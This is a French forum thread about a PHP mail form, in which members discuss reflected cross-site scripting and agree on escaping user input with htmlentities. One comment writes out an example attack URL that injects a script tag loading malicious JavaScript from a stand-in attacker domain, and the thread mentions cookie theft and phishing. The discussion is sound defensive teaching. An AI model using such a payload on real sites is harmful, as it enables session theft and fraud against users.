FORMULAIRE ENVOI PAR MAIL AVEC MESSAGE D'ERREUR

Signaler
Messages postés
1662
Date d'inscription
lundi 16 septembre 2002
Statut
Membre
Dernière intervention
30 juillet 2008
-
Messages postés
59
Date d'inscription
mardi 15 février 2005
Statut
Membre
Dernière intervention
4 juin 2010
-
Cette discussion concerne un article du site. Pour la consulter dans son contexte d'origine, cliquez sur le lien ci-dessous.

https://codes-sources.commentcamarche.net/source/24784-formulaire-envoi-par-mail-avec-message-d-erreur

Messages postés
59
Date d'inscription
mardi 15 février 2005
Statut
Membre
Dernière intervention
4 juin 2010

Ok je n'avais pas pensé a ce cas de figure. Merci et donc en conclusion il faut filtrer le html(avec htmlentites)toutes les variables demandé à l'utilisateur et que l'on affiche au format html!!!!!
Messages postés
654
Date d'inscription
jeudi 3 avril 2003
Statut
Membre
Dernière intervention
10 février 2009
1
Le hacker peut inciter une personne à cliquer sur un lien (social engineering)
(exemple: http://sitevulnerable.com/?variablePasSecurisée=<script src="http://siteduhacker.com/scriptMalveillant.js"></script>);
la victime en cliquant sur le lien (le hacker l'aura bien entendu camouflé) injectera dans sa propre page le code javascript du hacker
Messages postés
59
Date d'inscription
mardi 15 février 2005
Statut
Membre
Dernière intervention
4 juin 2010

Oui je suis entierement d'accord avec toi qu'il ne faut pas laisser le javascript actif!! mais ce raisonnement n'a de valeur uniquement si un internaute malveillant mes un codes javascript sur une pages que d'autres interanutes peuvent consulter (par exemple dans un forum). Pour le cas qui est exposé au dessus on va afficher les variables saisies par l'utilisateur temporairement sur la page et il n'y aura uniquement que l'internaute qui les aura saisies qui sera concerné par ces variables. En conséquence si il rentre du javascript il ne pourra uniquement que lire ces propres cookies ou ce rediriger que lui meme vers une autre page web. Les conséquences ne seront valable uniquement que pour l'internaute qui a saisie les variable. Donnez moi votre avis sur ce raisonnement?
Messages postés
654
Date d'inscription
jeudi 3 avril 2003
Statut
Membre
Dernière intervention
10 février 2009
1
Combiné avec du social engineering (la victime devra cliquer sur le lien),
Un hacker pourrait mettre (par exemple) un code javascript qui lui enverrait le cookie de la victime sur ce domaine, ou ouvrirait une nouvelle fenetre avec une fausse identification ebay ou paypal (fishing) etc.. on peut presque tout faire en javascript
Donc non, ça ne sert pas à rien =)
Afficher les 13 commentaires